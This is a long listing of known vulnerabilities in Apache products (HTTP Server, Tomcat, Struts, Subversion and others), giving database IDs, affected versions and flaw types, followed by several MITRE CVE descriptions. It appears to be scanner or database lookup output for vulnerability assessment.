| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
| [65668] Apache Solr 4.0.0 Updater denial of service
| [65665] Apache Solr up to 4.3.0 denial of service
| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
| [65410] Apache Struts 2.3.15.3 cross site scripting
| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
| [65340] Apache Shindig 2.5.0 information disclosure
| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
| [10826] Apache Struts 2 File privilege escalation
| [65204] Apache Camel up to 2.10.1 unknown vulnerability
| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
| [64722] Apache XML Security for C++ Heap-based memory corruption
| [64719] Apache XML Security for C++ Heap-based memory corruption
| [64718] Apache XML Security for C++ verify denial of service
| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
| [64716] Apache XML Security for C++ spoofing
| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
| [64485] Apache Struts up to 2.2.3.0 privilege escalation
| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
| [64467] Apache Geronimo 3.0 memory corruption
| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
| [64457] Apache Struts up to 2.2.3.0 cross site scripting
| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
| [9184] Apache Qpid up to 0.20 SSL misconfiguration
| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
| [8873] Apache Struts 2.3.14 privilege escalation
| [8872] Apache Struts 2.3.14 privilege escalation
| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
| [64006] Apache ActiveMQ up to 5.7.0 denial of service
| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
| [8427] Apache Tomcat Session Transaction weak authentication
| [63960] Apache Maven 3.0.4 Default Configuration spoofing
| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
| [63750] Apache qpid up to 0.20 checkAvailable denial of service
| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
| [63747] Apache Rave up to 0.20 User Account information disclosure
| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
| [7687] Apache CXF up to 2.7.2 Token weak authentication
| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
| [63090] Apache Tomcat up to 4.1.24 denial of service
| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
| [62833] Apache CXF -/2.6.0 spoofing
| [62832] Apache Axis2 up to 1.6.2 spoofing
| [62831] Apache Axis up to 1.4 Java Message Service spoofing
| [62830] Apache Commons-httpclient 3.0 Payments spoofing
| [62826] Apache Libcloud up to 0.11.0 spoofing
| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
| [62661] Apache Axis2 unknown vulnerability
| [62658] Apache Axis2 unknown vulnerability
| [62467] Apache Qpid up to 0.17 denial of service
| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
| [6301] Apache HTTP Server mod_pagespeed cross site scripting
| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
| [62035] Apache Struts up to 2.3.4 denial of service
| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
| [61229] Apache Sling up to 2.1.1 denial of service
| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
| [61094] Apache Roller up to 5.0 cross site scripting
| [61093] Apache Roller up to 5.0 cross site request forgery
| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
| [60708] Apache Qpid 0.12 unknown vulnerability
| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
| [4882] Apache Wicket up to 1.5.4 directory traversal
| [4881] Apache Wicket up to 1.4.19 cross site scripting
| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
| [60352] Apache Struts up to 2.2.3 memory corruption
| [60153] Apache Portable Runtime up to 1.4.3 denial of service
| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
| [4571] Apache Struts up to 2.3.1.2 privilege escalation
| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
| [59888] Apache Tomcat up to 6.0.6 denial of service
| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
| [59850] Apache Geronimo up to 2.2.1 denial of service
| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
| [58413] Apache Tomcat up to 6.0.10 spoofing
| [58381] Apache Wicket up to 1.4.17 cross site scripting
| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
| [57568] Apache Archiva up to 1.3.4 cross site scripting
| [57567] Apache Archiva up to 1.3.4 cross site request forgery
| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
| [4355] Apache HTTP Server APR apr_fnmatch denial of service
| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
| [57425] Apache Struts up to 2.2.1.1 cross site scripting
| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
| [57025] Apache Tomcat up to 7.0.11 information disclosure
| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
| [56512] Apache Continuum up to 1.4.0 cross site scripting
| [4285] Apache Tomcat 5.x JVM getLocale denial of service
| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
| [4283] Apache Tomcat 5.x ServletContect privilege escalation
| [56441] Apache Tomcat up to 7.0.6 denial of service
| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
| [54693] Apache Traffic Server DNS Cache unknown vulnerability
| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
| [54012] Apache Tomcat up to 6.0.10 denial of service
| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
| [52894] Apache Tomcat up to 6.0.7 information disclosure
| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
| [52786] Apache Open For Business Project up to 09.04 cross site scripting
| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
| [52584] Apache CouchDB up to 0.10.1 information disclosure
| [51757] Apache HTTP Server 2.0.44 cross site scripting
| [51756] Apache HTTP Server 2.0.44 spoofing
| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
| [51690] Apache Tomcat up to 6.0 directory traversal
| [51689] Apache Tomcat up to 6.0 information disclosure
| [51688] Apache Tomcat up to 6.0 directory traversal
| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
| [50626] Apache Solr 1.0.0 cross site scripting
| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13217| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13218| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
13219| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
13220| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
13221| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
13222| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
13223| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
13224| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
13225| [47214] Apachefriends xampp 1.6.8 spoofing
13226| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
13227| [47162] Apachefriends XAMPP 1.4.4 weak authentication
13228| [47065] Apache Tomcat 4.1.23 cross site scripting
13229| [46834] Apache Tomcat up to 5.5.20 cross site scripting
13230| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
13231| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
13232| [86625] Apache Struts directory traversal
13233| [44461] Apache Tomcat up to 5.5.0 information disclosure
13234| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
13235| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
13236| [43663] Apache Tomcat up to 6.0.16 directory traversal
13237| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
13238| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
13239| [43516] Apache Tomcat up to 4.1.20 directory traversal
13240| [43509] Apache Tomcat up to 6.0.13 cross site scripting
13241| [42637] Apache Tomcat up to 6.0.16 cross site scripting
13242| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
13243| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
13244| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
13245| [40924] Apache Tomcat up to 6.0.15 information disclosure
13246| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
13247| [40922] Apache Tomcat up to 6.0 information disclosure
13248| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
13249| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
13250| [40656] Apache Tomcat 5.5.20 information disclosure
13251| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
13252| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
13253| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
13254| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
13255| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
13256| [40234] Apache Tomcat up to 6.0.15 directory traversal
13257| [40221] Apache HTTP Server 2.2.6 information disclosure
13258| [40027] David Castro Apache Authcas 0.4 sql injection
13259| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
13260| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
13261| [3414] Apache Tomcat WebDAV Stored privilege escalation
13262| [39489] Apache Jakarta Slide up to 2.1 directory traversal
13263| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
13264| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
13265| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
13266| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
13267| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
13268| [38524] Apache Geronimo 2.0 unknown vulnerability
13269| [3256] Apache Tomcat up to 6.0.13 cross site scripting
13270| [38331] Apache Tomcat 4.1.24 information disclosure
13271| [38330] Apache Tomcat 4.1.24 information disclosure
13272| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
13273| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
13274| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
13275| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
13276| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
13277| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
13278| [37292] Apache Tomcat up to 5.5.1 cross site scripting
13279| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
13280| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
13281| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
13282| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
13283| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
13284| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
13285| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
13286| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
13287| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
13288| [36225] XAMPP Apache Distribution 1.6.0a sql injection
13289| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
13290| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
13291| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
13292| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
13293| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
13294| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
13295| [34252] Apache HTTP Server denial of service
13296| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
13297| [33877] Apache Opentaps 0.9.3 cross site scripting
13298| [33876] Apache Open For Business Project unknown vulnerability
13299| [33875] Apache Open For Business Project cross site scripting
13300| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
13301| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
13302|
13303| MITRE CVE - https://cve.mitre.org:
13304| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
13305| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
13306| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
13307| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
13308| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
13309| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
13310| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
13311| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
13312| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
13313| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
13314| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
13315| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
13316| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
